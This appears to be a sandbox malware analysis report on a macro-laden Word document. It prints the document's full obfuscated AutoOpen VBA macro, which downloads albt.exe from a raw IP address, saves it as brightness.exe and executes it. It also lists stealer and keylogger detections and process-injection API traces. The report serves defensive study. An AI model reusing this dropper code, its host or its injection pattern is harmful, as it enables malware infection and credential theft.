00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000011.00000002.3850452895.0000000028401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000011.00000002.3850452895.000000002853D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3855219862.00000000294A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3855219862.00000000294A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000011.00000001.2446904495.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	false

Show Windows behavior

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine
AutoOpenAPIs: 6, Strings: 20, Number of lines: 59, Relevance: 70.059

APIs	Meta Information
CreateObject	CreateObject("MSXML2.ServerXMLHTTP")
CreateObject	CreateObject("Adodb.Stream")
Open	IServerXMLHTTPRequest2.Open("GET","http://147.124.216.113/albt.exe",False)
Send
responsebody	IServerXMLHTTPRequest2.responsebody() -> ?P\x02\x00\x04\x0f?\x00\xfffd\x00\x00\x00@\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00????????????????4???????????\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00O ??\x00\x00\x00\x00\xfffd?c??\x05?\x07\x00\x00?\x05?\x00?\x05\x00@?\x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00? ?\x00\x00\x00\x02\x00\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x05?\x00?\x06?\x06\x00\x00\x00\x00\x00\x00\x00\x00 \x06?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x06\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x05?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??t\x00?\x05?\x00?\x05?\x00\x00\x00\x00\x00\x00\x00 ????\x00?\x00?\x05?\x00?\x05\x00\x00\x00\x00\x00\x00 ???a\x00?\x00?\x05?\x00?\x05\x00\x00\x00\x00\x00\x00@???\x00\x00?\x00?\x05\x00\x00?\x05\x00\x00\x00\x00\x00\x00\x00????\x00?\x00?\x05?\x00?\x05\x00\x00\x00\x00\x00\x00@???\x00\x004\x00?\x06\x00\x00?\x05\x00\x00\x00\x00\x00\x00\x00????\x00\x18\x00 \x06?\x00?\x05\x00\x00\x00\x00\x00\x00@????\x00?\x00 \x06?\x00?\x05\x00\x00\x00\x00\x00\x00@???c\x00?\x06?\x06?\x06?\x06\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00? \x00\x00? \x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@????U\x00\x00\x01\x00?@??????@?@???\x01\x00?\x00??@?????\x00?????@???\x01\x00?\x00??@???\x03\x00?\xfffd??@?????\x05\x00????@?????@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x04\x00\x00\x00?@?@?@?@?@?@?@?@?????@??????\x00\x00\x00????\x00?@??????\x00\x00\x01\x00\x00\x00?\x00\x00\x00????\x03?????M????M????M???????A\x00\x00\x00\x00\x00?\x00\x00\x00???\x00\x00\x00?@?@?@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x0c\x00?@?@?@?@?@?@?@?@?@????????????E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E????\x00?????I??????????E???E???E???E???W\x00?????????????????`????????\xfffd????????????????t???@?????????@???????????????@?????????????????????@???????????????@???????????????????????????????????????@???????????????????????????????????????????????????@?C????I????????????????@?A???I??????????????????E??????????E?????? ?????\x00???\x03????\x03???E????????????E?????\x00????E?\x00??? ????E?????????????????????\x0b???????????\x00?????E??????E?????????h\x10?\x00\x14j?????????????E????\xfffd?????\x02\x00??????????E??????????????E????????????????????E????????????\x10\x01???\x00??h??j???????????????E??E??E?????\x00????????????????h????????????????\x00?????? ???E??\x00???????E????????????????f??????A????C??\x03?????????\x03??\xfffd\x01?????\xfffd\x01?????\xfffd\x01?????j???A\x00??????????????E??A\x00???E?j???A\x00???E????????u??E????\x00\x00?????????E??????????????????E??????\x01???????????????????E????E????\x00??????E??E???????????E???????????E????\x01\x00????????????\x03????\xfffd\x01?????????\xfffd\x01???????????????\x01??\x00?\xfffd??????????????????E???????????? ????????????????E???????E??E??????????\x00???????????????????E??-?????????????????\x00??????????????\x00??????????????????\x00??????????????????????????\x03?????????????????????????\xfffd\x01?????????\xfffd\x01?????????????\xfffd\x01?????????\xfffd\x01??????????????\x00?????????\x00????????????\x13?????????????\x00?????????\x00???????a??\x0b????????E?\x13??????????\x00h?????????????\x13????\x02\x00??E?\x13??E??E???????????????????\x00????????@\x00????????????????????????? ???????????????????????????????????\x02????l??????\x00??????????\x00???\x00?\xfffd\x00?\x0b??\x00?\xfffd????????\x00?\xfffd\x01??????j???\xfffd\x01????????????\x00????????????????jU??\x0b???????????\x00????????E????????????????????????????\x00??????\x00???\x00?\xfffd\x01???????????\xfffd\x01?????????????\x00????????????\x00??????????Q?????\xfffd\x00%????????????????????\x0b?c????????\x00???????\x00??A????????????????????????????????????\x00??????A??????????????????????????????????????????????????????????????????@?x???????????\x04???????????????????????????@??E????????\xfffd???????????????E???@????????????????????????????????\|????????????????????????????????????????????????????????????????????????????????\xfffd?????????????\x7f???????????????????????????\x1f???????????????@??????\x0c?s????????????????????????????????????\x00?????\xfffd????????\xfffd\x10?????????????????u?????????R???z?????????@????????\x00\x01????H???????????E????????????????????E?????????\x00??h\x10?\x00\x01j????E??E???@??????????????E???E???????????\x00?????E????^?????????????????????7???????\x00?????????????????????\xfffd?????????\xfffd\x00???\xfffd??\x00???????\x00??????????????\x00???A\x00?\xfffd\x00?????????\x00?????????????????????????????????????????\xfffd???8??\x00??\x02\x00???????\xfffd\x00??\xfffd\x00??????????????????????????\x00?????????????????\x01?\x0b??????\x00?\x0b??????????E?\x00????????????\x00???\x00???????????\x00???????????????\xfffd????????????????????????????????????????\xfffd???????????????????E?????\x00??????\x02???\xfffd??????????(\x00???????\x00???????????????\xfffd???????\xfffd?\x00??????????\x01?>?\xfffd\x00??????@?\x00???????????\xfffd?f?f?????????f?f?f??????????@?\x00???????????? ??K??????\x07\x00???????@?\x00????????????\x00???????????f?f?f???????????????????????\x00???@????????\xfffd???????????????@?\x00??????????????\x00\x00?????????? ????????????????????\x03\x00????-\x00??????j??????\x00????????????????????\x00\x00??????????????????? ???\xfffd\x00\x00???n???\x00?????????????????????????????\xfffd\x00\x00?\x00???????????\x00????????\x00???????????????????????????7\x00???;???@??????????\x01\x00??????\xfffd\x00%????\x0b???\x00?\x04?????\x07\x00???????????????????\x00?\xfffd?????\x00??s??\xfffd??P\x00???????????%??????????????E?E??E?E\xfffd\x04??E???????????????????@??h???E????h?????????7\x00?????????\x01\x00????????\xfffd\x04??E?????????
Shell	Shell(""brightness.exe"") -> 7368

Strings	Decrypted Strings
"M""S""X""M""L""2"".""S""er""ver""XM""LH""TTP"
"Ad""od""b.S""tr""ea""m"
"h"
"t"
"t""p:/""/147.124.216.113/albt"
"."
"e"
"x"
"e"
"GET"
"brightness"
"."
"e"
"x"
"e"
"""brightness"
"."
"e"
"x"
"e"""

Line	Instruction	Meta Information
9	Sub AutoOpen()
11	Dim xHttp	executed
16	Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")	CreateObject("MSXML2.ServerXMLHTTP") executed
18	Dim bStrm
20	Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")	CreateObject("Adodb.Stream") executed
24	Dim nirm1
25	nirm1 = "h"
26	Dim nirm2
27	nirm2 = "t"
28	Dim nirm3
29	nirm3 = "t" & "p:/" & "/147.124.216.113/albt"
30	Dim nirm4
31	nirm4 = "."
32	Dim nirm5
33	nirm5 = "e"
34	Dim nirm6
35	nirm6 = "x"
36	Dim nirm7
37	nirm7 = "e"
41	Dim plpl
42	plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7
45	xHttp.Open "GET", plpl, False	IServerXMLHTTPRequest2.Open("GET","http://147.124.216.113/albt.exe",False) executed
46	xHttp.Send	Send
52	With bStrm
53	. Type = 1
54	. Open
55	. write xHttp.responsebody	IServerXMLHTTPRequest2.responsebody() -> ?P\x02\x00\x04\x0f?\x00\xfffd\x00\x00\x00@\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00????????????????4???????????\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00O ??\x00\x00\x00\x00\xfffd?c??\x05?\x07\x00\x00?\x05?\x00?\x05\x00@?\x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00? ?\x00\x00\x00\x02\x00\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x05?\x00?\x06?\x06\x00\x00\x00\x00\x00\x00\x00\x00 \x06?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x06\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x05?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??t\x00?\x05?\x00?\x05?\x00\x00\x00\x00\x00\x00\x00 ????\x00?\x00?\x05?\x00?\x05\x00\x00\x00\x00\x00\x00 ???a\x00?\x00?\x05?\x00?\x05\x00\x00\x00\x00\x00\x00@???\x00\x00?\x00?\x05\x00\x00?\x05\x00\x00\x00\x00\x00\x00\x00????\x00?\x00?\x05?\x00?\x05\x00\x00\x00\x00\x00\x00@???\x00\x004\x00?\x06\x00\x00?\x05\x00\x00\x00\x00\x00\x00\x00????\x00\x18\x00 \x06?\x00?\x05\x00\x00\x00\x00\x00\x00@????\x00?\x00 \x06?\x00?\x05\x00\x00\x00\x00\x00\x00@???c\x00?\x06?\x06?\x06?\x06\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00? \x00\x00? \x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@????U\x00\x00\x01\x00?@??????@?@???\x01\x00?\x00??@?????\x00?????@???\x01\x00?\x00??@???\x03\x00?\xfffd??@?????\x05\x00????@?????@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x04\x00\x00\x00?@?@?@?@?@?@?@?@?????@??????\x00\x00\x00????\x00?@??????\x00\x00\x01\x00\x00\x00?\x00\x00\x00????\x03?????M????M????M???????A\x00\x00\x00\x00\x00?\x00\x00\x00???\x00\x00\x00?@?@?@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x0c\x00?@?@?@?@?@?@?@?@?@????????????E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E???E????\x00?????I??????????E???E???E???E???W\x00?????????????????`????????\xfffd????????????????t???@?????????@???????????????@?????????????????????@???????????????@???????????????????????????????????????@???????????????????????????????????????????????????@?C????I????????????????@?A???I??????????????????E??????????E?????? ?????\x00???\x03????\x03???E????????????E?????\x00????E?\x00??? ????E?????????????????????\x0b???????????\x00?????E??????E?????????h\x10?\x00\x14j?????????????E????\xfffd?????\x02\x00??????????E??????????????E????????????????????E????????????\x10\x01???\x00??h??j???????????????E??E??E?????\x00????????????????h????????????????\x00?????? ???E??\x00???????E????????????????f??????A????C??\x03?????????\x03??\xfffd\x01?????\xfffd\x01?????\xfffd\x01?????j???A\x00??????????????E??A\x00???E?j???A\x00???E????????u??E????\x00\x00?????????E??????????????????E??????\x01???????????????????E????E????\x00??????E??E???????????E???????????E????\x01\x00????????????\x03????\xfffd\x01?????????\xfffd\x01???????????????\x01??\x00?\xfffd??????????????????E???????????? ????????????????E???????E??E??????????\x00???????????????????E??-?????????????????\x00??????????????\x00??????????????????\x00??????????????????????????\x03?????????????????????????\xfffd\x01?????????\xfffd\x01?????????????\xfffd\x01?????????\xfffd\x01??????????????\x00?????????\x00????????????\x13?????????????\x00?????????\x00???????a??\x0b????????E?\x13??????????\x00h?????????????\x13????\x02\x00??E?\x13??E??E???????????????????\x00????????@\x00????????????????????????? ???????????????????????????????????\x02????l??????\x00??????????\x00???\x00?\xfffd\x00?\x0b??\x00?\xfffd????????\x00?\xfffd\x01??????j???\xfffd\x01????????????\x00????????????????jU??\x0b???????????\x00????????E????????????????????????????\x00??????\x00???\x00?\xfffd\x01???????????\xfffd\x01?????????????\x00????????????\x00??????????Q?????\xfffd\x00%????????????????????\x0b?c????????\x00???????\x00??A????????????????????????????????????\x00??????A??????????????????????????????????????????????????????????????????@?x???????????\x04???????????????????????????@??E????????\xfffd???????????????E???@????????????????????????????????\|????????????????????????????????????????????????????????????????????????????????\xfffd?????????????\x7f???????????????????????????\x1f???????????????@??????\x0c?s????????????????????????????????????\x00?????\xfffd????????\xfffd\x10?????????????????u?????????R???z?????????@????????\x00\x01????H???????????E????????????????????E?????????\x00??h\x10?\x00\x01j????E??E???@??????????????E???E???????????\x00?????E????^?????????????????????7???????\x00?????????????????????\xfffd?????????\xfffd\x00???\xfffd??\x00???????\x00??????????????\x00???A\x00?\xfffd\x00?????????\x00?????????????????????????????????????????\xfffd???8??\x00??\x02\x00???????\xfffd\x00??\xfffd\x00??????????????????????????\x00?????????????????\x01?\x0b??????\x00?\x0b??????????E?\x00????????????\x00???\x00???????????\x00???????????????\xfffd????????????????????????????????????????\xfffd???????????????????E?????\x00??????\x02???\xfffd??????????(\x00???????\x00???????????????\xfffd???????\xfffd?\x00??????????\x01?>?\xfffd\x00??????@?\x00???????????\xfffd?f?f?????????f?f?f??????????@?\x00???????????? ??K??????\x07\x00???????@?\x00????????????\x00???????????f?f?f???????????????????????\x00???@????????\xfffd???????????????@?\x00??????????????\x00\x00?????????? ????????????????????\x03\x00????-\x00??????j??????\x00????????????????????\x00\x00??????????????????? ???\xfffd\x00\x00???n???\x00?????????????????????????????\xfffd\x00\x00?\x00???????????\x00????????\x00???????????????????????????7\x00???;???@??????????\x01\x00??????\xfffd\x00%????\x0b???\x00?\x04?????\x07\x00???????????????????\x00?\xfffd?????\x00??s??\xfffd??P\x00???????????%??????????????E?E??E?E\xfffd\x04??E???????????????????@??h???E????h?????????7\x00?????????\x01\x00????????\xfffd\x04??E????????? executed
59	Dim monu1
60	monu1 = "brightness"
61	Dim monu2
62	monu2 = "."
64	Dim monu3
65	monu3 = "e"
67	Dim monu4
68	monu4 = "x"
70	Dim monu5
71	monu5 = "e"
73	Dim monu6
74	monu6 = monu1 & monu2 & monu3 & monu4 & monu5
77	. savetofile monu6, 2
80	Dim parveen1
81	Dim parveen2
82	Dim parveen3
83	Dim parveen4
84	Dim praveen1
85	praveen1 = """brightness"
86	Dim praveen2
87	praveen2 = "."
89	Dim praveen3
90	praveen3 = "e"
92	Dim praveen4
93	praveen4 = "x"
95	Dim praveen5
96	praveen5 = "e"""
101	Dim praveen6
102	praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5
106	End With
108	Shell (praveen6)	Shell(""brightness.exe"") -> 7368 executed
110	End Sub

Reset < >

Analysis Process: brightness.exePID: 7368, Parent PID: 1812COMMON

Execution Graph

Execution Coverage:	16.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	29.4%
Total number of Nodes:	1688
Total number of Limit Nodes:	17

Executed Functions

Function 02798C28 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654
threadnativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0279889C: LoadLibraryA.KERNEL32(00000000,00000000,02798983), ref: 027988D0
Part of subcall function 0279889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02798983), ref: 027988E0
Part of subcall function 0279889C: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 027988F9
Part of subcall function 0279889C: FreeLibrary.KERNEL32(74AD0000,00000000,027DB388,Function_0000662C,00000004,027DB398,027DB388,000186A3,00000040,027DB39C,74AD0000,00000000,00000000,00000000,00000000,02798983), ref: 02798963

Part of subcall function 02798654: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027986E0

GetThreadContext.KERNEL32(000005A0,027DB420,ScanString,027DB3A4,0279A7F4,UacInitialize,027DB3A4,0279A7F4,ScanBuffer,027DB3A4,0279A7F4,ScanBuffer,027DB3A4,0279A7F4,UacInitialize,027DB3A4), ref: 027994BA

Part of subcall function 027982CC: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0279833D

Part of subcall function 0279853C: NtUnmapViewOfSection.NTDLL(?,?), ref: 027985A1

Part of subcall function 02797A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02797A9F

Part of subcall function 02797D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02797DEC

SetThreadContext.KERNEL32(000005A0,027DB420,ScanBuffer,027DB3A4,0279A7F4,ScanString,027DB3A4,0279A7F4,Initialize,027DB3A4,0279A7F4,00000894,0021EFF8,027DB4F8,00000004,027DB4FC), ref: 0279A1CF
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000005A0,00000000,000005A0,027DB420,ScanBuffer,027DB3A4,0279A7F4,ScanString,027DB3A4,0279A7F4,Initialize,027DB3A4,0279A7F4,00000894,0021EFF8,027DB4F8), ref: 0279A1DC

Part of subcall function 02798818: LoadLibraryW.KERNEL32(bcrypt,?,000005A0,00000000,027DB3A4,0279A43F,ScanString,027DB3A4,0279A7F4,ScanBuffer,027DB3A4,0279A7F4,Initialize,027DB3A4,0279A7F4,UacScan), ref: 0279882C
Part of subcall function 02798818: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02798846
Part of subcall function 02798818: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005A0,00000000,027DB3A4,0279A43F,ScanString,027DB3A4,0279A7F4,ScanBuffer,027DB3A4,0279A7F4,Initialize), ref: 02798882

Strings

SLGetLicenseInformation, xrefs: 02799217
ntdll, xrefs: 0279A4DD, 0279A4F1, 0279A5A9, 0279A74C, 0279A760
UacScan, xrefs: 02798D2B, 02798F43, 0279953F, 0279993B, 02799AAF, 0279A259, 0279A6F1
ScanString, xrefs: 02798CBA, 02798E65, 02799013, 0279943B, 02799621, 027997A8, 02799C35, 02799DF3, 02799F63, 0279A0D6, 0279A3C1, 0279A46E
OpenSession, xrefs: 02798C61, 02799084, 02799136, 0279A507, 0279A64D
NtOpenProcess, xrefs: 0279A75B
NtOpenObjectAuditAlarm, xrefs: 0279A4EC, 0279A5A4
Initialize, xrefs: 02798FA2, 027995B0, 02799737, 02799B20, 02799D82, 02799EF2, 0279A065, 0279A2CA, 0279A5FB
bcrypt, xrefs: 0279A430, 0279A444, 0279A458
sppc, xrefs: 0279922E
advapi32, xrefs: 0279A5BD
ScanBuffer, xrefs: 02798D84, 02798E0C, 027991A7, 027992BC, 02799359, 02799692, 02799819, 027999AC, 02799B91, 02799CA6, 02799E64, 02799FD4, 0279A147, 0279A33B, 0279A559, 0279A69F
NtReadVirtualMemory, xrefs: 0279A4D8
BCryptQueryProviderRegistration, xrefs: 0279A43F
MiniDumpWriteDump, xrefs: 0279A5CC
BCryptVerifySignature, xrefs: 0279A42B
NtSetSecurityObject, xrefs: 0279A747
BCryptRegisterProvider, xrefs: 0279A453
UacInitialize, xrefs: 02798EEA, 0279924B, 027993CA, 027994CE, 027998CA, 02799A3E, 0279A1E8
dbgcore, xrefs: 0279A5D1, 0279A5E5
MiniDumpReadDumpStream, xrefs: 0279A5E0
I_QueryTagInformation, xrefs: 0279A5B8

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 4083799063-51457883
Opcode ID: 52a2d0bdf80a04023dea980e719f711545589260bccad942fa54f03aa593bf80
Instruction ID: f70d234fe3444a2dce68d209d5a8733a29e3f15a6e549ed61e71804c111c6ff3
Opcode Fuzzy Hash: 52a2d0bdf80a04023dea980e719f711545589260bccad942fa54f03aa593bf80
Instruction Fuzzy Hash: 30E23075B4121A9BDF12FB65E8AAFCE73B6EF85300F1041E19005AB214DE71AE86CF51

Function 02798C26 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0279889C: LoadLibraryA.KERNEL32(00000000,00000000,02798983), ref: 027988D0
Part of subcall function 0279889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02798983), ref: 027988E0
Part of subcall function 0279889C: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 027988F9
Part of subcall function 0279889C: FreeLibrary.KERNEL32(74AD0000,00000000,027DB388,Function_0000662C,00000004,027DB398,027DB388,000186A3,00000040,027DB39C,74AD0000,00000000,00000000,00000000,00000000,02798983), ref: 02798963

Part of subcall function 02798654: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027986E0

GetThreadContext.KERNEL32(000005A0,027DB420,ScanString,027DB3A4,0279A7F4,UacInitialize,027DB3A4,0279A7F4,ScanBuffer,027DB3A4,0279A7F4,ScanBuffer,027DB3A4,0279A7F4,UacInitialize,027DB3A4), ref: 027994BA

Part of subcall function 027982CC: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0279833D

Part of subcall function 0279853C: NtUnmapViewOfSection.NTDLL(?,?), ref: 027985A1

Part of subcall function 02797A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02797A9F

Strings

SLGetLicenseInformation, xrefs: 02799217
ntdll, xrefs: 0279A4DD, 0279A4F1, 0279A5A9, 0279A74C, 0279A760
UacScan, xrefs: 02798D2B, 02798F43, 0279953F, 0279993B, 02799AAF, 0279A259, 0279A6F1
ScanString, xrefs: 02798CBA, 02798E65, 02799013, 0279943B, 02799621, 027997A8, 02799C35, 02799DF3, 02799F63, 0279A0D6, 0279A3C1, 0279A46E
OpenSession, xrefs: 02798C61, 02799084, 02799136, 0279A507, 0279A64D
NtOpenProcess, xrefs: 0279A75B
NtOpenObjectAuditAlarm, xrefs: 0279A4EC, 0279A5A4
Initialize, xrefs: 02798FA2, 027995B0, 02799737, 02799B20, 02799D82, 02799EF2, 0279A065, 0279A2CA, 0279A5FB
bcrypt, xrefs: 0279A430, 0279A444, 0279A458
sppc, xrefs: 0279922E
